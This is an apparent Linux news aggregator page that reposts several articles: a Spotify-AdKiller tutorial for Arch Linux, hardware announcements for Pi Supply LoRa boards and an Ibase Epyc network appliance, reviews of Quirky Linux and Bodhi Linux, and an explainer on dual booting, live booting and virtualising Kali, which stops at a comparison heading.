Linux Blimp

By Francesco Mondello</a>”>Francesco Mondello on October 15, 2018

In this tutorial we will see how to mute Spotify ads on Arch Linux with a very simple and lightweight script I found on GitHub called Spotify-AdKiller.

If you’re using Spotify Free on your Arch Linux system (or any kind of Linux distro), this useful script will be able to mute its annoying audio ads.

Spotify-AdKiller allows you to block Spotify ads in 3 different ways:

• Simple
• Interstitial
• Continuous

We will see in details these 3 different features after the installation!

How to install Spotify-AdKiller on Arch Linux

Spotify-AdKiller it’s packed for Ubuntu and OpenSuse as well, but we will see in details how to install and configure it on Arch Linux:

Since there’s a package in the AUR repos, we can install it using an AUR package manager or using these commands:

git clone https://aur.archlinux.org/spotify-adkiller-git.git cd spotify-adkiller-git makepkg -si

After installing it, we will see a menu entry called Spotify (AdKiller) with the famous Spotify green icon.

How to Configure Spotify-AdKiller

As said before, Spotify-AdKiller has 3 different ways to work:

• simple: mute Spotify, unmute when ad is over
• interstitial: mute Spotify, play random local track, stop and unmute when ad is over
• continuous: mute Spotify, play random local track, stop and unmute when track is over

The default ad blocking mode is continuous.

How to block Spotify Ads

In order to completely mute Spotify ads on Arch Linux, open the file $HOME/.config/Spotify-AdKiller/Spotify-AdKiller.cfg (if it doesn’t exist, run the Spotify-AdKiller script).

In the CUSTOM_MODE section add simple.

From now on, Spotify ads will be muted. Anyway, if you are a frequent Spotify user, consider obviously to get your Premium subscription! 🙂

You can get more info about Spotify-AdKiller on GitHub.

Source

Pi Supply is Kickstartering Iot LoRa Gateway and IoT LoRa Node pHAT add-ons for the Raspberry Pi, as well as a LoRa Node that works with the Micro:bit. An Arduino node is also in the works.

Pi Supply, which has produced a variety of Raspberry Pi add-on boards including the Papirus E-Paper display and Flick HAT gesture detector, has now returned to Kickstarter to launch a series of IoT LoRa Boards that work with the Pi. The offerings include an IoT LoRa Gateway HAT board starting at an early bird price of 120 UK Pounds ($157) and a LoRa Node pHAT node board with a 25 Pound ($33) early bird price.

Pi Supply’s IoT LoRa Boards
(click image to enlarge)

Both boards support any 40-pin Raspberry Pi, and they may also work with other SBCs with Pi-compatible 40-pin connectors, including the tested Asus Tinker Board, Asus

Tinker Board S

, and Odroid-C2. Pi Supply is also selling a Micro:bit LoRa Node board that works with the open source, Cortex-M0 based BBC

Micro:bit

board.

IoT LoRa Gateway HAT (left) and LoRa Node pHAT
(click images to enlarge)

Packages are available that include both the gateway and a node of your choic. There are also “To Go Kits” that include an SBC. For the 189 Pound ($248) Gateway To Go Kit, you get a full-sized Raspberry Pi of your choice up to a Raspberry Pi Model 3B+ along with a case, power supplies, SD cards and other accessories. The Node To Go Kit includes either a Micro:bit board, or for the pHAT model, a Pi Zero or Pi Zero W, as well as power supplies and accessories. There are also a variety of volume discount bundles.

LoRa background

LoRa is a long-range, low-bandwidth wireless standard that can work in peer-to-peer fashion between low-cost, low-power LoRa nodes. LoRa nodes can also connect to the Internet via a LoRaWAN gateway such as a Raspberry Pi with the IoT LoRa Gateway HAT. The Pi Supply boards can be purchased with support for the 868MHz European standard that most LoRaWAN networks use, or else the 915MHz U.S. standard.

LoRa/LoRaWAN technology is finding increasing use in IoT networks for irrigation systems, smart metering, smart cities, and home and building automation. The technology lets you connect to networks that run on top of LoRaWAN, including The Things Network.

Other LoRa add-ons for the Raspberry Pi include Sparkfun’s LoRa Raspberry Pi Gateway, Dragino’s LoRa GPS HAT for Raspberry Pi, and the Pi Conduit and Pi Conduit PoE boards from Gumstix. In addition, Lime Microsystems offers a Grove Starter Kit for the LimeSDR Mini that is designed to connect the Pi with the LoRA-ready LimeSDR board.

IoT LoRa Gateway HAT

The IoT LoRa Gateway HAT is built around the RAKWireless RAK833 mini-PCIe module. This LoRa gateway concentrator is in turn driven by a Semtech SX1301 LoRa baseband chip, which is also used on Arduino’s LoRa Gateway Kit shield.

IoT LoRa Gateway HAT with Raspberry Pi (left) and RAKWireless RAK833
(click images to enlarge)

The RAK833 module enables the IoT LoRa Gateway HAT to listen on 8x channels simultaneously. The board offers relatively low power consumption — it will draw about 500mA from the Raspberry Pi’s 5V Rail. The board is also touted for its fast setup, which does not require soldering or a software compile.

LoRa Node boards

The LoRa Node pHAT and micro:bit LoRa Node boards both use the RAKWireless RAK811 LoRa radio module “with full LoRaWAN Stack embedded.” The LoRa Node pHAT, which adopts the Raspberry Pi Zero sized pHAT (partial HAT) form factor, communicates with the Raspberry Pi over UART using only 3x GPIO pins.

Micro:bit LoRa Node with Micro:bit board and battery pack

Both the Pi and Micro:bit compatible nodes provide 8x pins that can be controlled via UART, including two for analog sensors. A u.FL connector and onboard antenna are also available. Both node boards consume less than 50mA maximum during transmission and are said to typically run at 30mA at 3.3V peak during operation and less than 1mA during sleep.

The Kickstarter FAQ indicates the company is working on an Arduino compatible IoT LoRa Node Shield, which has the same 25 Pound early bird and 29 Pound standard pricing as the other node boards. This is listed as an option in the shopping options, but is not detailed in the main text, so it’s unclear if this will share the Mar. 2019 ship date of the other boards. Assuming the campaign reaches its $32K goal by Nov. 6 (it’s halfway there), a BeagleBone cape version is also under consideration.

In the risk and challenges section, Pi Supply notes that it has learned from the problems it had with its much delayed PiJuice HAT uninterruptible power supply add on board for the Raspberry Pi, which is now shipping for 48 Pounds. “We are looking to build on the lessons learnt there to do things better,” says Pi Supply.

Further information

Early bird Kickstarter prices are 120 UK Pounds ($157) for theIoT LoRa Gateway HAT board (129 Pounds standard price) and 25 Pounds ($33) for the LoRa Node pHAT and Micro:bit LoRa Node boards (29 Pounds standard). More information may be found at Pi Supply’s IoT LoRa Boards Kickstarter page and eventually on the Pi Supply website.

Source

Ibase has launched the first network appliance based on AMD’s Epyc Embedded 3000 SoC. The 1U rackmount “FWA8800” appliance features 16 or 32 GbE ports and is built on a new “MBN806” ATX board.

We don’t regularly cover high-end, rackmount network appliances, but we thought this one might be of interest: As promised in February when AMD announced the Xeon-like Epyc Embedded 3000 SoC along with its Ryzen Embedded V1000, Ibase has released the first network appliance based on the Epyc chip. The 1U rackmount FWA8800 network appliance features 2x or 4x NIC slots for up to 16x or 32 GbE ports.

FWA8800 (left) and MBN806
(click images to enlarge)

The FWA8800 is built around a separately available Ibase MBN806 ATX board equipped with an octa-core Epyc Embedded 3201 clocked to 1.5GHz (3.1GHz max. boost). No OS details were mentioned, but the original benchmarks for the Epyc Embedded 3000 were run on Ubuntu Linux and Windows 10.

“The FWA8800 is optimized for throughput performance and high-density deployments in applications such as network security, VPN/SDN/NFV/SD-WAN, and data management and analytics,” stated Jason Ko, senior product manager at Ibase.

Epyc Embedded 3000 models, including 3201 model used on the FWA8800 and MBN806
(click image to enlarge)

The edge server focused, x86 compatible

Epyc Embedded 3000

offers 4x to 16x cores available in single or multi-threading models with TDPs ranging from 30W to 100W. The mid-range Epyc Embedded 3201 found on the MBN806 board and FWA8800 appliance is single threaded but offers the lowest available TDP at 30W. The SoC has a 16MB L3 cache.

MBN806 ATX board

Driving the FWA8800 appliance is the first motherboard we’ve seen running the Epyc Embedded 3000. The 306 x 280mm ATX form-factor MBN806 board is equipped with 4x DIMM slots for up to 64GB UDIMM DDR4-2667 RAM or up to 128GB RDIMM DDR4. (The server-oriented RDIMM, or Registered DMMM, can offer two to three times the capacity of standard UDIMM RAM, but typically requires a throttling back to slower 1066MHz memory operation.)

MBN806 angle views
(click images to enlarge)

The MBN806 has a single Intel I210-AT GbE controller, with the number of NIC slots depending on the SKU. The default is dual NIC slots. There are also dual SATA slots, as well as a rear expansion PCIe x8 slot and an M.2 M-key (PCIe x4 + SATA) interface.

Although the Epyc Embedded 3000 is headless, you can select an optional IPMI 2.0 module that supports VGA output. Intelligent Platform Management Interface (IPMI) is a Board Management Controller (BMC) technology typically found on server-class products such as Xeon-based COM Express Type 7 modules.

The MBN806 is equipped with an “IDN806” module that provides 2x USB 2.0 ports, an RJ45 console port, GPIO based factory default button, 3x LEDs, and an MGMT interface shared with the IPMI NC-SI port. The board supports 0 to 60°C temperatures.

FWA8800 network appliance

The 1U rackmount, 500 x 328 x 44mm FWA8800 network appliance offers all the features of the MBN806 motherboard, including the dual NIC modules with up to 16 GbE ports and the single WAN console port. The press release, but not the product page, mentions an option to double this to 4x NIC slots for 32 GbE ports.

FWA8800 front view
(click image to enlarge)

The dual SATA ports can optionally be deployed with dual hot-swappable 2.5-inch SATA bays or a single 3.5-inch bay. The IPMI 2.0 module with the VGA port continues to be optional. Other options include a TPM 2.0 security chip.

FWA8800 rear views showing single (left) and redundant power supplies
(click images to enlarge)

The FWA8800 is equipped with a 250W ATX power supply, which can be swapped out for a 300W 1+1 redundant supply (see above image at right). The system has a 0 to 40°C range.

Further information

The FWA8800 network appliance and MBN806 ATX board appear to be available now, with pricing undisclosed. More information may be found in Ibase’s FWA8800 announcement and on its FWA8800 and MBN806 product pages.

Source

By Jack M. Germain

Aug 23, 2018 5:00 AM PT

Quirky Linux is a classic example of what makes Linux such a varied and useful operating system.

Puppy Linux developer Barry Kauler earlier this month released Quirky Xerus 64 version 8.6, which comes packed with the latest innovations for doing Linux stuff differently.

This latest in the “Xerus” series is a must-try if you like to push your computing experience envelope. It offers a slightly different approach to blending a traditional Linux desktop with the latest in usability options.

Quirky Xerus64 is a far stretch from the look and feel of Windows 10. Its Welcome screen simplifies desktop setup.

Quirky is related to the Puppy Linux family of distros, but it is not a mainline Puppy Linux release. Rather, it is a distinct distro in its own right. Its website is minimalist, but you can search out technical support for Quirky in the Puppy Linux forums.

Version 8.6 is an incremental release with package upgrades and architectural improvements, including the Linux kernel 4.14.63. One of its newest tricks is providing support for file sharing with an Android phone via the EasyShare network file and printer sharing tool.

I am a long-time Puppy Linux fan. I’ve relied on it for years as a pocket Linux tool. Quirky goes several steps further with innovations for enhanced productivity.

The main menu in Quirky Linux is stuffed with many of the tools and applications found in its cousin distro, Puppy Linux.

Different Strokes

Kauler forked Puppy Linux into Quirky Linux back in 2009 in order to explore new concepts. He had stepped down as Puppy Linux’s lead developer a few years earlier, only to return with a new dogpound of ideas in the Quirky distro offshoot.

Quirky is binary-compatible with x86_64 Ubuntu 16.04.5 LTS. Otherwise, it is nothing at all like Ubuntu. It is architecturally very different.

Quirky is an experimental distribution that boots from a USB stick or CD and runs in system RAM for lightning-fast performance. Like its Puppy cousin, Quirky is a lightweight distro that provides a powerhouse of features and usability.

It looks like a Puppy Linux clone, but Quirky Linux follows a different path than its Puppy distro cousin. Quirky Xerus explores some new ideas while continuing the Puppy Linux tradition of providing a full suite of optimized applications, drivers and utilities in a very small size.

Common Ground

Quirky Linux’s desktop structure and appearance are similar to Puppy Linux.

Under the hood, Quirky is much different than Puppy, but its applications, utilities and user interface indicate a strong connection to Puppy.

Quirky uses Joe’s Window Manager for its desktop environment. JWM is a more compact desktop interface than found in GNOME or Xfce or LXDE. Both distros are designed to run on legacy, low-powered desktops and laptops.

However, Kauler did not stop at lightweight. He shoehorned lots of heavyweight performance into Quirky. For instance, he succeeded in weeding out typical lightweight applications in favor of full-featured heavyweights like GIMP and LibreOffice.

Puppy Linux is not meant to be fully installed on a hard drive. It lets you do a partial or frugal hard drive installation. That is where the persistent storage comes from by using a special personal savings file on the hard disk or a 2-GB USB stick.

Quirky Linux is sort of structured to function in reverse. It is designed to be fully installed. However, it does not have to be. You can run it from a CD or USB drive and maintain configuration updates for a pocket Linux system with a setup option.

If you are really adventurous and your hardware supports an SD card, you also can run Quirky from that storage device.

Strangely Functional

Quirky Linux is aptly named. It is peculiar compared to whatever operating system you use. Still, it has traditional panel bars, familiar-looking menus, and lots of configuration options.

Quirky Linux is configured from a main control panel and many menu tools. You can access the menu from the button on the left of the panel bar or by right-clicking on the desktop.

I have a long satisfying history with Puppy Linux. I started using it a decade ago on a USB drive when I traveled around frequently and was working on banks of Windows boxes in whatever office I visited.

So Quirky Linux fits right into my computing routines. It offers the next generation of portable Linux power and productivity. It takes the Puppy Linux concept to the next level. That familiarity makes working with Quirky a comfy experience.

What’s Inside

Quirky is not a dumbed-down Linux distro crammed onto a USB drive. It comes complete with a full set of kernel, printing, scanning and camera drivers. It has an ample supply of multimedia libraries. The Adobe Flash player is included as an optional installation. Quirky offers a quick install option of some common programs.

Quirky also does not skimp on applications. It includes a full suite of top-rated programs. The current release sheds some of the earlier software baggage such as Ami Word and Gnumeric spreadsheet.

Instead, you get the LibreOffice 5 office suite and lots more business and multimedia software headliners. The default Web browser is SeaMonkey version 2.49.4, but other choices are available in the PETget Package Manager.

Also included are Leafpad text editor and Geany IDE/editor. Other standard apps are ROX-filer file manager, the MPlayer media player and CUPS (Common Unix Printing System) support for printing. Overall, the software available through the Quirky repository will handle most, if not all, of the typical user’s needs.

Look and Feel

If you are familiar with Puppy Linux, you will be right at home running Quirky Linux. If you know any of the Ubuntu Linux desktop flavors, you will need some time moving in and getting cozy with Quirky.

The menu is nearly overwhelming. The categories are stuffed with applications that appear foreign. You will recognize some classic software titles. Mostly, though, you will have to click around to see what the Puppy/Quirky titles do.

Like Puppy Linux variants, Quirky’s software format is the Pet file structure. The Pet repository has its unique characteristics. It gives you access to numerous Ubuntu software warehouses, but those applications are packaged in the Pet format.

As is typical for lightweight desktops, the JWN environment is bereft of glitz, glitter and animations. But the speed and the range of functionality will impress you.

Quirky Linux has only a few background images. Its Qwallpaper switcher app lacks a random or timed display function.

Using Quirky

I last reviewed Quirky Linux in January of 2014. I was pleased with its performance then, but it didn’t displace my well-worn earlier version of Puppy Linux installed on a USB drive.

Quirky Linux succeeded this time around in replacing that well-worn Puppy distro. After testing this latest release, it was an easy decision to keep using it rather than process an upgraded installation of a more recent Puppy Linux release.

Being familiar with how Quirky operates, I was more concerned with newly developed differences Quirky Xerus 8.6 displayed in setting up and running its various options for full and partial operation. One of its chief advantages is using it as a live session OS with the ability to maintain persistent memory easily.

Installing an OS to a USB stick is a potential dogfight. The variables involve both the application that burns the system to the USB drive and the quality of the USB drive itself. The drive’s transfer speed is a factor in how well Quirky on a Stick performs.

Choices and Workarounds

As I expected, Quirky booted up from CD without any issues. However, running the OS from CD (or DVD) involves a long waiting period for the code to transfer to system RAM.

You can continue to run Quirky from the CD if you are satisfied with the default settings and software. Or you can click the SAVE button on the desktop to store your configuration settings and software updates in a special file anywhere you wish on the hard drive.

This approach gives you a computing solution that amounts to a live session on steroids. This method is a great way to run a first-class Linux OS on your Windows computer in a dual-boot setting without the hard drive partitioning issues.

From the live session startup, you can click the INSTALL button on the desktop to do a full installation of Quirky Linux to a hard drive. Do you have an external USB hard drive hanging around? Use that and take the full installation to any computer, but plug it into the external drive.

Be prepared for some troubleshooting if you opt for the USB stick installation method. You might have to try several different USB devices. It seems that the installation process for Quirky Linux can be a bit quirky.

Making It Work

The developer provides detailed
instructions for installing Quirky Linux to a USB stick as well as other storage options.

One of the tools for installing Quirky to a USB stick is the dd utility — but that did not work well. Neither did a few other tools.

What did work was doing the installation from the running live session using the Setup option in the main menu. I clicked on the Easy DD Frontend for dd tool and had Quirky installed on an 8-GB (recommended minimum size) USB thumb drive.

It is much easier — and apparently more effective with Quirky Linux — than using the dd commands in a console window. The application asked me to click on the location to the image file and then click on the location of the USB drive getting the installation.

It is a long process — it took 30 minutes — but it worked.

Bottom Line

Get Quirky Linux here. You have two choices. One is the standard ISO to burn to CD. The other is the gz archived package used for installing Quirky Linux to a USB drive.

Quirky Linux is not a distro that meets everyone’s computing needs. Unlike other distros, such as Linux Mint or Zorin, Quirky Linux does not have the look and feel of a Windows desktop.

Want to Suggest a Review?

Is there a Linux software application or distro you’d like to suggest for review? Something you love or would like to get to know?

Please
email your ideas to me, and I’ll consider them for a future Linux Picks and Pans column.

And use the Reader Comments feature below to provide your input!

Jack M. Germain has been an ECT News Network reporter since 2003. His main areas of focus are enterprise IT, Linux and open source technologies. He has written numerous reviews of Linux distros and other open source software.
Email Jack.

Source

By Jack M. Germain

Aug 30, 2018 10:23 AM PT

Bodhi Linux is an alternative to traditional Linux OSes that can change your desktop user experience.

It is one of a very few Linux distros using
Moksha, a forked version of the Enlightenment desktop.

Enlightenment is a Compositing Window Manager and Desktop Shell. It is radically different from other lightweight interface shells such as Xfce and LXDE. Its roots go back to 1996, when it started out as a project to build a Window Manager for X11. That project has started to transition to
Wayland.

It also evolved to handle mobile, wearable and tv user interface requirements. It is still viable in
Tizen, the Android offshoot platform.

Bodhi Linux 5.0.0 is a lightweight OS with a future-leaning desktop design.

The Bodhi community forked Enlightenment 17 several years ago in response to the lack of developmental progress from the
Enlightenment project.

The E19 (Enlightenment 19) release is relatively heavy and not suitable for older hardware, according to Bodhi developers. That gave rise to Moksha, actively maintained and updated with the latest Enlightenment libraries.

Bodhi is highly modular, with high levels of customization and choice of themes. This latest release brings a post-modern look and updated Ubuntu core (18.04) Bionic Beaver to the fast desktop.

The current Moksha desktop displays refinements over earlier releases. For example, it has a new default wallpaper, new themes for the login and boot sequence, and a Bodhi-branded version of the popular Arc GTK theme.

Enlightened Development

Moksha is very customizable. It has many features and options that contribute to its futuristic design and innovative desktop UI.

This gives the forked Enlightenment desktop an advantage over traditional Lightweight Linux desktops compared to choices such as GNOME, Cinnamon and KDE Plasma. While the Moksha desktop is light on resources, it has a modern look.

When creator Jeff Hoogland launched the Bodhi OS seven years ago, the distro used Enlightenment. In fact, the name “Bodhi” in Sanskrit means “enlightened” or “the one with sense.”

Hence, its developers called Bodhi “the Enlightened Linux Distribution.” That moniker stuck. The community earlier this month released Bodhi Linux 5.0 as the fifth major release of the distro.

Consistent Affair

This is my fourth review of Bodhi in its seven-year growing cycle. From my earliest hands-on assessment, Bodhi piqued my interest. It was different and surprisingly agile for a lightweight desktop. Even in its infancy, it impressed me.

The developers pushed the original concept to be more than impressive. The change in direction turned Moksha into a more functional desktop environment than the original Enlightenment release. Moksha was more adaptable to home use or office computing without a dumbed-down user interface.

Considering Bodhi’s limited developmental releases, you would expect considerable changes with each major release. However, version 5.0.0 lacks a lengthy change log, which Hoogland points out in his release notes. That is especially the case for updates to the Moksha desktop.

That results from the consistent stability the developers built into the Bodhi platform. Bodhi has been stable and well-performing for the last few releases. Other than the under-the-hood upgrades supplied from the Ubuntu 18.04 base, changes in this latest Bodhi release are design elements that improve its aesthetics.

Packaged Design

The Enlightened Linux distro takes a minimalist approach to computing. It does not give users an overstuffed collection of software that they will never use. Instead, it offers a modular architecture. Out of the box, the basic computing tools are present.

Bodhi follows a minimalist software philosophy to keep down software bloat. It does this perhaps to the point of overkill.

What does not come bundled with the installation ISO, you can add from the Bodhi repository or the Synaptic Package Manager. If you do not like a particular look out of the box, you can change it easily.

Bodhi comes in three flavors for the one-desktop distro. All three choices maintain the minimalist design. The options are Standard Release, Legacy Release and AppPack Release.

Typically, you get essential software only out of the box. These include a terminal, Web browser, text editor, and the PCManFM file manager.

Mainly Minimal

The Standard Edition is geared toward typical 64-bit desktop, laptop and workstation computers, but it is extremely minimalist by design. The software and theme options are very limited. So be prepared to do a lot of package installing to suit your computing needs.

The Legacy Edition works on older 32-bit hardware. The Legacy ISO image gives you an older Linux kernel optimized for hardware that is 15 or more years old. This kernel lacks the PAE extension, which is not supported on many older systems. The software and theme limitations are bare bones, just like the 64-bit Standard Edition.

The AppPack Edition is the most complete of the three options. You can use it as a full-featured live CD or base install. It comes with additional themes and applications installed by default.

The range of software and theme choices is still strictly minimal. The goal is to keep the software bloat as low as possible. If you do more than surf the Web with a browser, use email and handle light office tasks, you will be installing your must-have packages.

How Modular Design Works

Bodhi Linux has system tray icons. That element is fairly standard. With Moksha, they’re gadgets and modules.

Gadgets are small applications that either provide system information or perform a specific action. Gadgets are highly configurable by right-clicking the gadget on the screen.

Modules are the traditional icons. Gadgets are more like a mini control center. You can monitor a lot of things, including screen brightness, system temperature and CPU speed. A gadget inventory is provided, but most are not loaded by default to keep Bodhi Linux as lightweight as possible.

Shelves house gadgets. The desktop structure allows more than one shelf on a desktop, so you can have different shelves on different virtual desktops.

This arrangement is similar to the Activities feature in KDE Plasma and GNOME. Each shelf can house its own unique set of gadgets and application launchers.

You can locate shelves at the middle or a corner of any screen edge. This lets you get better use out of different size display screens.

To configure shelves, right-click them and choose Shelf > Settings from the context menu. You can set stacking, Position, Size and more. You can locate shelves on a specific virtual desktop or on all desktops.

The Plus Factor

This is where the iBar gadget comes into play. It is an application dock that houses launchers for frequently used applications. It also tracks them with a small orange dot.

Bodhi’s iBar does what a traditional panel bar does plus a bit more. It serves as a dock for running applications. It also can be a very useful tool.

Hover the mouse over one of these marked icons to reveal its launch menu. Other options show a thumbnail of the application and its title bar label.

If more than one instance of an application has been launched, both will appear in this menu. Click on one of these to bring its window into focus.

Also, you can use it to restore a minimized window, or windows hidden behind another app.

Getting Personal

Another desktop feature not found elsewhere is the Personal Application Launcher for desktop files that you create yourself. They are hidden files stored in your Home directory at .local/share/applications. These folder names begin with a period. To see them, open the file manager and press Ctrl+H.

Personal Application launchers are very useful. You can create specialized on/off switches to make various desktop functions available with a single click.

They also are handy for launching a command line application without having to open a terminal manually and enter the command phrase. It is easy to learn the pattern for writing your personalized launchers. Open application launchers come bundled in the installation at /usr/share/applications in a text editor.

Many applications are launched with an argument, often %U or %f. These two arguments control the number of files that can be passed to the application. For instance, %f opens 1 file. %U opens multiple files.

Bodhi’s Quick Launcher app is a standalone menu that supplements the main menu. It provides a search window that speeds up finding apps and files.

Enlightened Highlights

One of Bodhi’s more useful user interface traits is the left-click feature anywhere on the desktop that pops up the menu. It is very convenient. A more traditional menu button is also present on the Bodhi panel bar.

This bar can be on any edge of the screen. Right-clicking on the panel opens configuration settings. The orientation setting provides a list of placement options for the panel bar.

In addition to standard key bindings for keyboard shortcuts, Bodhi Linux has an extensive edge binding setting. You can set up to eight edge bindings. You can select a desired behavior or desktop action for each edge location.

That makes one “pointer gesture” for each edge and one for each corner. By default no edge bindings are set. Find the setting in Main menu > Settings > Settings Panel > Input > Edge Bindings.

Disappointing System Tools

Bodhi’s AppCenter is one of my biggest disappointments with this distro. It is not uncommon for a smaller or newer Linux distro to forgo its own applications repository in favor of more general purposes software warehouses using the Synaptic Package Manager.

Given the developer’s fervor for minimalizing software to avoid application bloat, more emphasis should be placed on providing meaningful software. The AppCenter does not rise to this task.

You Add/remove Bodhi-specific packages with the AppCenter. This is a Web-based software installation tool. When you open the supposed software application, Bodhi loads the lightweight default Midori Web browser to install applications directly from the Bodhi Linux AppCenter.

That repository resembles a fire sale two days after closing, so you must do most serious application installing through the Synaptic application.

The Enlightenment File Manager (EFM) is tweaked to work within Bodhi Linux to add files and launchers to the desktop by moving the desired files and launchers into the desktop folder located in the home directory. You can opt out of displaying desktop icons at Main Menu>Settings>All>Files>File Manager under the Display tab.

You can add other file managers and designate other default applications for more traditional functionality. Go to Main Menu/Settings/All/Apps/Default Applications.

More Woeful Basics

You face a similar tradeoff in handling basic system maintenance. The eepdater app updates the system components. Despite its listing in the main menu under Applications > System Tools as System Updater, it merely launches a rebranded terminal window to automate the Command Line Interface commands with the esudo app.

Basically, the esudo app is pretty much like gksudo of GNOME or kdesudo of the KDE Plasma desktop. Like the AppCenter, the eepdater app is not a standalone application to update the system.

Even the Swami Control Panel leaves oh so much to wish for as a really functional system settings tool. Swami only has a few categories in its control panel. In order to gain access to other system settings, you must return to the System Settings portion of the skimpy main menu to hunt around for other options.

Considering that the UI should be more intuitive within the “enlightenment” design, all of this easily creates a sense of confusion. One such “other” control panel is the Everything application. It seems that what is not controlled in other configuration panels may be covered with the Everything app.

One of the more confusing aspects of Bodhi Linux is the appearance of seemingly new things that are little more than a naming game. They are not new features that do not exist in other distros — only their names are different.

For instance, Terminology is the terminal application for entering command Line Instructions. It is more user-friendly, however, with some handy menus.

Bottom Line

Bodhi Linux is elegant and lightweight. It is worth putting this distro through its paces. It will not please every power user, but it offers a nice change of pace.

This distro can be a productive and efficient computing platform. Bodhi is very easy to use. It has a low learning curve. New Linux users can get acquainted right away.

Bodhi’s minimum system requirements are a 500mhz processor with 256 MB of RAM and 5 GB of drive space. You will get better performance from a computer with a 1.0ghz processor powered by 512 MB of RAM and 10 GB of drive space.

The installation routine is driven by the Ubiquity Installer. No surprise there since Bodhi is based on Ubuntu Linux.

Want to Suggest a Review?

Is there a Linux software application or distro you’d like to suggest for review? Something you love or would like to get to know?

Please
email your ideas to me, and I’ll consider them for a future Linux Picks and Pans column.

And use the Reader Comments feature below to provide your input!

Jack M. Germain has been an ECT News Network reporter since 2003. His main areas of focus are enterprise IT, Linux and open source technologies. He has written numerous reviews of Linux distros and other open source software.
Email Jack.

Source

If you are yet to have a Kali instance running on your machine, then you have quite a dilemma ahead of you. There are three ways to go about running Kali, each with their own advantages and disadvantages. In this article, I’ll tell you what exactly the terms Dual Boot, Live Boot, and Virtual machine installation mean, how easy/difficult these are to perform, and what are the advantages/disadvantages of each of them. In the end, I’ll tell you how to find guides for doing all of these.

PS: This guide (and the blog) is focused on Kali, but everything in this post is applicable to Linux in general. Certain parts are related to hacking, but you can take networking lessons from them regardless, even if you aren’t interested in hacking per se.

Dual Boot

Most of you would be running a single operating system on your system right now. However, that doesn’t have to be the case. We can partition our hard disk, and install multiple operating systems alongside each other.

Think of how you have multiple partitions in your Windows (C,D,E,F drives). All your Windows system files would usually be in C (local disk). What if you let go of drive F (copy it’s content to C,D,E first), and decide to install Kali’s system files on it (you can install Kali’s system files on your computer using the .iso file of Kali that is available for download). Now, you will have 3 drives of Windows format (NTFS), and one drive with Linux format (ext4). C drive (NTFS), will have Windows installed, and F drive (ext4, and it’s name isn’t really F drive anymore), has Linux.

But since your computer loads the system files during bootup, it needs to know whether to load files from C drive or from the “formerly F” drive. This is handled by the bootloader.

This was a gross oversimplification. Here’s a nice article on

HowToGeek

that explains stuff in more details.

This is when Kali installer asks where it should install the OS. In the sample explanation, you should install it where the “F” drive of Windows is. If you instead install it over the “C” drive, you’ll lose Windows, and will only have Kali in your system.

Once you have installed Kali on a system which already had Windows, the bootloader (GRUB) will ask you which of them to boot from.

USB Boot

In the above example, we had Windows on our C,D,E,F partitions. The C partition had the system files, while D,E,F had other files. We decided to overwrite F and install Kali’s system files over there. When we wanted to run Windows, we booted from C, and when we wanted to run Kali, we booted from the “former F drive” (of course we didn’t know what exactly we are booting for, GRUB handles that for us, we just have to choose).

So, can we, instead of installing Kali on our F drive, install it on an external Hard Disk, and then boot from that external hard disk? The answer is yes. Well, you may ask, the size of Kali’s ISO is <4 GB. What if I have a 16 GB USB flash drive. Surely, the installed OS will not take more than 16GB. Why use a hard disk, let me just install the OS on a USB flash drive.

Well, the answer to that is yes too. You can but 10 USB flash drives, and install 10 different operating systems on each of them, and then plug in whichever one you want, boot from it, and if your OS supports the filesystem of your hard disks, you can use your computers hard disks as well. You actually don’t even need hard disks at all. You can run your computer from a flash drive itself.

However, remember how I said

install the OS on the USB flash drive

. Turns out, you don’t even have to install the OS. In general, for most software, there is ‘an installer’, and after the installer finishes it’s job, we have the software installed and then can use it. For example, take a simple game. Suppose it has a setup.exe file on the CD drive you bought. When you run that, you can’t yet play the game, and you instead need to install it on your hard disk, after which it can be played. This is true for operating systems as well. If you plug in a Windows installation CD/DVD/USB into your computer, it will do what the name says, install Windows on your computer. Upon installation, you can run Windows.

But with some Linux distributions, we have the ability to run the OS without installation(live boot). You can take the ISO, burn it to a DVD drive, and “live boot” it. It will not touch your hard disk, and everything will run directly on your primary memory (RAM). Hence, the installer also acts as the installed software.

So, simply download Kali Linux’ iso, and copy it to a USB, and you are done. Except for a little problem, USB drives are not bootable by default. So you need a little software which will properly perform the copying of the iso to the USB drive, such that it can be booted from.

In summary, download the ISO, use a tool to intelligently copy the ISO to a flash drive, plug in the flash drive, and boot from it. It will ask you whether you want to Install the OS, or start running it right away (live boot). Just select the live boot option, and Kali is up and running, without any installation. However, since everything happens in volatile primary memory (RAM), changes are lost. So, everytime you boot into the live USB, it would be like running a fresh install (which can be both a good and a bad thing). With persistence mode, even this limitation is overcome, and you can have changes which persist across boots.

These are the choices offered when you boot from Kali’s installer on a USB You can run it live, run it live with persistence, or install the OS.

Virtual Machine

Suppose you only have Windows on your machine. How do you go from a powered off system to having a fully functional Windows running on your machine. Actually, a more useful question is, what all do you need to go from nothing to functional OS running. Here are a few things I can think of-

• System files that run the OS (or in other words, system files that basically the OS).
• A small core utility which can load the system files into memory from the hard disk (bootloader) when the computer is presently in a void like situation.
• Memory where the system files are loaded.
• Processing power which runs the OS.
• Hard Disk space, where you can store stuff, Networking so that you can access the internet, and so on.

So, from a powerless state, in the presence of all the above, we can move to a state where we have a functional Windows instance running on our system. The question I want to ask you is, from a state where we have a functional Windows instance running on our system, can we move to a state where we have two functional OSs running on our system?

The answer should be, why not, if we have all the requirements that can result in a transition from 0 to 1, then if same requirements are met again, we can go from 1 to 2. In other words, if we have-

• System files that run the second OS
• A different core utility which can load the system files into memory from the hard disk (bootloader) when we have an OS running on the system already (as opposed to being in a void like situation)
• Memory, separate from the already runnning OS’s memory, where the system files of this OS are loaded.
• Processing power, separately for this OS, which runs the OS.
• Hard Disk space, separately for this OS, where you can store stuff, Networking so that you can access the internet, and so on.

The above discussion should tell you that it would indeed be possible to run multiple OSs together, by somehow dividing the memory, hard disk space, processor power, etc. into two, and letting both OSs run on their share.

Without going into too much detail, let me just tell you that using hypervisors, this has indeed been achieved, and now we can run multiple OS inside one OS, given that there are enough resources to sustain the needs of all the simultaneously running OSs. VMware has been a pioneer in this technology, but they only offer limited capability VMWare player for free, while VMWare workstation will cost you. On the other hand, VirtualBox provides free open source products.

Now that you know about all the different ways to run Kali, be it alongside Windows, inside Windows (virtually), or live without installation, let me tell you about advantages and disadvantages of these methods.

Multiple Operating systems can run simultaneously as virtual machines. In the picture, you can see VmWare workstation and various virtual machines on it.

Comparison

Live Boot V/S Dual Boot

